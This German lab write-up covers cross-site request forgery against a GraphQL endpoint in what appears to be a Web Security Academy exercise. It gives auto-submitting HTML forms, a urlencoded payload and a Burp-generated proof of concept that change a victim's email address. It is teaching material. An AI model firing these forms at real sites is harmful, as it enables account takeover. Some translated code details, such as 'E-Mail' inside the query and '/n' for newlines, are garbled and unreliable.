> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/graphql/csrf-exploitation-via-graphql.md).

# CSRF-Ausnutzung über GraphQL

### CSRF-Exploits über GraphQL ausführen

#### Laborkontext

Benutzerverwaltungsfunktionen basieren auf einem **GraphQL** Endpunkt. / Kernpunkt: l

**Ziel:** Erstellen Sie eine HTML-Seite (gehostet auf dem Exploit-Server), die, wenn sie vom Opfer geladen wird, **ändert seine E-Mail-Adresse**.

<figure><img src="/files/53e4aa8ad7876aa33053f65f5d86d40ec1ceae35" alt=""><figcaption></figcaption></figure>

#### Beobachtete GraphQL-Abfrage

Wenn Sie die E-Mail in der Anwendung ändern, sieht die gesendete Anfrage wie folgt aus

```json
{
  "query": "/n    mutation changeEmail($input: ChangeEmailInput!) {/n        changeEmail(input: $input) {/n            email/n        }/n    }/n",
  "operationName": "changeEmail",
  "variables": {
    "input": {
      "email": "test@test.com"
    }
  }
}
```

### Methode 1: Einfaches CSRF mit Formular (empfohlen)

Die Idee besteht darin, die GraphQL-Mutation über ein **Formular-POST** an den GraphQL-Endpunkt, mit `query`, `operationName` und `variables` Feldern.

Beispiel für eine Operation, die auf dem Operator abgelegt werden soll:

```javascript
<form
  class="login-form"
  name="change-email-form"
  action="https://0ace0022038ab64b803c033800f30057.web-security-academy.net/graphql/v1"
  method="POST"
>
  <input type="hidden" name="query" value="
    mutation changeEmail($input: ChangeEmailInput!) {
      changeEmail(input: $input) {
        E-Mail
      }
    }
  ">

  <input type="hidden" name="operationName" value="changeEmail">

  <input
    type="hidden"
    name="variables"
    value='{"input":{"email":"hacked@jord4n.pro"}}'
  >
</form>

<script>
  document.forms["change-email-form"].submit();
</script>
```

<figure><img src="/files/5f7e3bb2f548f918e1d23948ac0c755418d4c977" alt=""><figcaption></figcaption></figure>

Erwartetes Ergebnis: Wenn das Opfer die Seite öffnet, sendet sein/ihr Browser die Anfrage und **die E-Mail wird geändert**.

<figure><img src="/files/125ad8ad8a665cd3df3137064397f13a23f4c308" alt=""><figcaption></figcaption></figure>

### Methode 2: x-www-form-urlencoded

Hier kodieren Sie die Parameter direkt, wie bei einem klassischen Formular:

```bash
Content-Type: application/x-www-form-urlencoded
```

{% code overflow="wrap" %}

```bash
query=%0A++++mutation+changeEmail($input:+ChangeEmailInput!)+{%0A++++++++changeEmail(input:$input)+{%0A++++++++++++email%0A++++++++}%0A++++}%0A&operationName=changeEmail&variables={"input":{"email":"test@test.com"}}
```

{% endcode %}

Praktisch, um schnell zu prüfen, wie die Anfrage aussieht.

<figure><img src="/files/acd2dcec079e3e3c9485189fcaaecaed89841ad2" alt=""><figcaption></figcaption></figure>

Aus Burp:

1. Klicken Sie mit der rechten Maustaste auf die GraphQL-Anfrage
2. **Commitment-Tools** → **CSRF-PoC generieren**
3. Burp erstellt ein direkt hostbares HTML, zum Beispiel:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ace0022038ab64b803c033800f30057.web-security-academy.net/graphql/v1" method="POST">
      <input type="hidden" name="query" value="&#10;&#32;&#32;&#32;&#32;mutation&#32;changeEmail&#40;&#36;input&#58;&#32;ChangeEmailInput&#33;&#41;&#32;&#123;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;changeEmail&#40;input&#58;&#36;input&#41;&#32;&#123;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;email&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#125;&#10;&#32;&#32;&#32;&#32;&#125;&#10;" />
      <input type="hidden" name="operationName" value="changeEmail" />
      <input type="hidden" name="variables" value="&#123;&quot;input&quot;&#58;&#123;&quot;email&quot;&#58;&quot;test&#64;test&#46;com&quot;&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

```

<figure><img src="/files/af8e774e690ae696632b3ac1249faa5cc2f81dd9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/graphql/csrf-exploitation-via-graphql.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
